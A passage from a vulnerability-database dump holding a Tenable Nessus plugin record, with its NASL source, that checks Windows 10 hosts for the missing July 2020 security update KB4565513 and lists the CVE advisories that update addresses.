attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1374)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted fonts. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists in the way that the Credential Enrollment Manager service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1368)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1406)\n\n - An information disclosure vulnerability exists when the Windows Graphics component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Graphics Component handles objects in memory. (CVE-2020-1351)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1468)\n\n - An elevation of privilege vulnerability exists when the Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1344, CVE-2020-1362, CVE-2020-1369)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-1402)\n\n - This security update corrects a denial of service in the Local Security Authority Subsystem Service (LSASS) caused when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause a denial of service on the target system's LSASS service, which triggers an automatic reboot of the system. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists when Windows Address Book (WAB) improperly processes vcard files. (CVE-2020-1410)\n\n - An elevation of privilege vulnerability exists when the Windows USO Core Worker improperly handles memory.\n (CVE-2020-1352)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An elevation of privilege vulnerability exists when Group Policy Services Policy Processing improperly handle reparse points. An attacker who successfully exploited this vulnerability could overwrite a targeted file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the Windows Modules Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - A denial of service vulnerability exists in the way that the WalletService handles files. An attacker who successfully exploited the vulnerability could corrupt system files. (CVE-2020-1364)\n\n - An information disclosure vulnerability exists when Skype for Business is accessed via Internet Explorer. An attacker who exploited the vulnerability could cause the user to place a call without additional consent, leading to information disclosure of the user profile. For the vulnerability to be exploited, a user must click a specially crafted URL that prompts the Skype app.\n (CVE-2020-1432)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Location Awareness Service handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1437)\n\n - A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1373, CVE-2020-1390, CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists when the Windows Cryptography Next Generation (CNG) Key Isolation service improperly handles memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1359, CVE-2020-1384)\n\n - An information disclosure vulnerability exists when the Windows Resource Policy component improperly handles memory. (CVE-2020-1358)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Function Discovery Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1085)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-1420)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1412)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1249, CVE-2020-1353, CVE-2020-1370, CVE-2020-1399, CVE-2020-1404, CVE-2020-1413)\n\n - An information disclosure vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1433)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1429)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1389, CVE-2020-1419)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Credential Picker handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1385)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1421)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1435)\n\n - An information disclosure vulnerability exists in the way that the WalletService handles memory.\n (CVE-2020-1361)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Sync Host Service handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1434)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly handle Ease of Access dialog. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. The security update addresses the vulnerability by ensuring that the Ease of Access dialog is handled properly. (CVE-2020-1398)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T00:00:00", "type": "nessus", "title": "KB4565513: Windows 10 July 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1085", "CVE-2020-1147", "CVE-2020-1249", "CVE-2020-1267", "CVE-2020-1333", "CVE-2020-1344", "CVE-2020-1346", "CVE-2020-1351", "CVE-2020-1352", "CVE-2020-1353", "CVE-2020-1354", "CVE-2020-1358", "CVE-2020-1359", "CVE-2020-1360", "CVE-2020-1361", "CVE-2020-1362", "CVE-2020-1364", "CVE-2020-1365", "CVE-2020-1368", "CVE-2020-1369", "CVE-2020-1370", "CVE-2020-1371", "CVE-2020-1373", "CVE-2020-1374", "CVE-2020-1384", "CVE-2020-1385", "CVE-2020-1389", "CVE-2020-1390", "CVE-2020-1393", "CVE-2020-1396", "CVE-2020-1397", "CVE-2020-1398", "CVE-2020-1399", "CVE-2020-1400", "CVE-2020-1401", "CVE-2020-1402", "CVE-2020-1403", "CVE-2020-1404", "CVE-2020-1406", "CVE-2020-1407", "CVE-2020-1408", "CVE-2020-1409", "CVE-2020-1410", "CVE-2020-1411", "CVE-2020-1412", "CVE-2020-1413", "CVE-2020-1419", "CVE-2020-1420", "CVE-2020-1421", "CVE-2020-1427", "CVE-2020-1428", "CVE-2020-1429", "CVE-2020-1430", "CVE-2020-1432", "CVE-2020-1433", "CVE-2020-1434", "CVE-2020-1435", "CVE-2020-1436", "CVE-2020-1437", "CVE-2020-1438", "CVE-2020-1468"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUL_4565513.NASL", "href": "https://www.tenable.com/plugins/nessus/138459", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138459);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\n \"CVE-2020-1085\",\n \"CVE-2020-1147\",\n \"CVE-2020-1249\",\n \"CVE-2020-1267\",\n \"CVE-2020-1333\",\n \"CVE-2020-1344\",\n \"CVE-2020-1346\",\n \"CVE-2020-1351\",\n \"CVE-2020-1352\",\n \"CVE-2020-1353\",\n \"CVE-2020-1354\",\n \"CVE-2020-1358\",\n \"CVE-2020-1359\",\n \"CVE-2020-1360\",\n \"CVE-2020-1361\",\n \"CVE-2020-1362\",\n \"CVE-2020-1364\",\n \"CVE-2020-1365\",\n \"CVE-2020-1368\",\n \"CVE-2020-1369\",\n \"CVE-2020-1370\",\n \"CVE-2020-1371\",\n \"CVE-2020-1373\",\n \"CVE-2020-1374\",\n \"CVE-2020-1384\",\n \"CVE-2020-1385\",\n \"CVE-2020-1389\",\n \"CVE-2020-1390\",\n \"CVE-2020-1393\",\n \"CVE-2020-1396\",\n \"CVE-2020-1397\",\n \"CVE-2020-1398\",\n \"CVE-2020-1399\",\n \"CVE-2020-1400\",\n \"CVE-2020-1401\",\n \"CVE-2020-1402\",\n \"CVE-2020-1403\",\n \"CVE-2020-1404\",\n \"CVE-2020-1406\",\n \"CVE-2020-1407\",\n \"CVE-2020-1408\",\n \"CVE-2020-1409\",\n \"CVE-2020-1410\",\n \"CVE-2020-1411\",\n \"CVE-2020-1412\",\n \"CVE-2020-1413\",\n \"CVE-2020-1419\",\n \"CVE-2020-1420\",\n \"CVE-2020-1421\",\n \"CVE-2020-1427\",\n \"CVE-2020-1428\",\n \"CVE-2020-1429\",\n \"CVE-2020-1430\",\n \"CVE-2020-1432\",\n \"CVE-2020-1433\",\n \"CVE-2020-1434\",\n \"CVE-2020-1435\",\n \"CVE-2020-1436\",\n \"CVE-2020-1437\",\n \"CVE-2020-1438\",\n \"CVE-2020-1468\"\n );\n script_xref(name:\"MSKB\", value:\"4565513\");\n script_xref(name:\"MSFT\", value:\"MS20-4565513\");\n script_xref(name:\"IAVA\", value:\"2020-A-0300-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0302-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0313-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4565513: Windows 10 July 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4565513. It is, \ntherefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1411)\n\n - An elevation of privilege vulnerability exists when the\n Windows Diagnostics Hub Standard Collector Service fails\n to properly sanitize input, leading to an unsecure\n library-loading behavior. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1393)\n\n - A remote code execution vulnerability exists in the way\n that DirectWrite handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit an untrusted webpage. The security update\n addresses the vulnerability by correcting how\n DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists when the\n Windows Profile Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1403)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1374)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted fonts. For all systems except Windows 10, an\n attacker who successfully exploited the vulnerability\n could execute code remotely. For systems running Windows\n 10, an attacker who successfully exploited the\n vulnerability could execute code in an AppContainer\n sandbox context with limited privileges and\n capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. There are multiple ways an\n attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists in the\n way that the Credential Enrollment Manager service\n handles objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1368)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1406)\n\n - An information disclosure vulnerability exists when the\n Windows Graphics component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An authenticated attacker\n could exploit this vulnerability by running a specially\n crafted application. The update addresses the\n vulnerability by correcting how the Windows Graphics\n Component handles objects in memory. (CVE-2020-1351)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1468)\n\n - An elevation of privilege vulnerability exists when the\n Windows Event Logging Service improperly handles memory.\n (CVE-2020-1365, CVE-2020-1371)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1344, CVE-2020-1362,\n CVE-2020-1369)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-1402)\n\n - This security update corrects a denial of service in the\n Local Security Authority Subsystem Service (LSASS)\n caused when an authenticated attacker sends a specially\n crafted authentication request. A remote attacker who\n successfully exploited this vulnerability could cause a\n denial of service on the target system's LSASS service,\n which triggers an automatic reboot of the system. The\n security update addresses the vulnerability by changing\n the way that LSASS handles specially crafted\n authentication requests. (CVE-2020-1267)\n\n - A remote code execution vulnerability exists when\n Windows Address Book (WAB) improperly processes vcard\n files. (CVE-2020-1410)\n\n - An elevation of privilege vulnerability exists when the\n Windows USO Core Worker improperly handles memory.\n (CVE-2020-1352)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1354, CVE-2020-1430)\n\n - An elevation of privilege vulnerability exists when\n Group Policy Services Policy Processing improperly\n handle reparse points. An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file that would normally require elevated permissions.\n (CVE-2020-1333)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1408)\n\n - An elevation of privilege vulnerability exists when the\n Windows Modules Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1346)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1396)\n\n - A denial of service vulnerability exists in the way that\n the WalletService handles files. An attacker who\n successfully exploited the vulnerability could corrupt\n system files. (CVE-2020-1364)\n\n - An information disclosure vulnerability exists when\n Skype for Business is accessed via Internet Explorer. An\n attacker who exploited the vulnerability could cause the\n user to place a call without additional consent, leading\n to information disclosure of the user profile. For the\n vulnerability to be exploited, a user must click a\n specially crafted URL that prompts the Skype app.\n (CVE-2020-1432)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Location Awareness Service\n handles objects in memory. An attacker who successfully\n exploited the vulnerability could allow an application\n with limited privileges on an affected system to execute\n code at a medium integrity level. (CVE-2020-1437)\n\n - A remote code execution vulnerability exists in .NET\n Framework, Microsoft SharePoint, and Visual Studio when\n the software fails to check the source markup of XML\n file input. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the process responsible for deserialization of the XML\n content. (CVE-2020-1147)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1373, CVE-2020-1390,\n CVE-2020-1427, CVE-2020-1428, CVE-2020-1438)\n\n - An elevation of privilege vulnerability exists when the\n Windows Cryptography Next Generation (CNG) Key Isolation\n service improperly handles memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1359,\n CVE-2020-1384)\n\n - An information disclosure vulnerability exists when the\n Windows Resource Policy component improperly handles\n memory. (CVE-2020-1358)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Function Discovery Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1085)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-1420)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1412)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1249, CVE-2020-1353, CVE-2020-1370,\n CVE-2020-1399, CVE-2020-1404, CVE-2020-1413)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge PDF Reader improperly handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1433)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1400, CVE-2020-1401, CVE-2020-1407)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1429)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1389,\n CVE-2020-1419)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Credential Picker handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could allow an application with limited\n privileges on an affected system to execute code at a\n medium integrity level. (CVE-2020-1385)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1421)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-1397)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1435)\n\n - An information disclosure vulnerability exists in the\n way that the WalletService handles memory.\n (CVE-2020-1361)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Sync Host Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could allow an application with limited\n privileges on an affected system to execute code at a\n medium integrity level. (CVE-2020-1434)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly handle Ease of\n Access dialog. An attacker who successfully exploited\n the vulnerability could execute commands with elevated\n permissions. The security update addresses the\n vulnerability by ensuring that the Ease of Access dialog\n is handled properly. (CVE-2020-1398)\");\n # https://support.microsoft.com/en-us/help/4565513/windows-10-update-kb4565513\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d0366a03\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4565513.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1435\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1436\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-07';\nkbs = make_list(\n '4565513'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'07_2020',\n bulletin:bulletin,\n rollup_kb_list:[4565513])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:15:46", "description": "The remote Windows host is missing security update 4565511. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows System Events Broker improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1357)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1411)\n\n - An elevation of privilege vulnerability exists when the Windows USO Core Worker improperly handles memory.\n (CVE-2020-1352)\n\n - An elevation of privilege vulnerability exists when the Windows Diagnostics Hub Standard Collector Service fails to properly sanitize input, leading to an unsecure library-loading behavior. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1393)\n\n - A remote code execution vulnerability exists in the way that DirectWrite handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage. The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory. (CVE-2020-1409)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Credential Picker handles objects in memory. An attacker who successfully exploited the vulnerability could allow an application with limited privileges on an affected system to execute code at a medium integrity level. (CVE-2020-1385)\n\n - An elevation of privilege vulnerability exists when the Windows Profile Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges.\n (CVE-2020-1360)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1403)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1374)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted fonts. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability:\n (CVE-2020-1436)\n\n - An elevation of privilege vulnerability exists in the way that the Credential Enrollment Manager service handles objects in memory. An 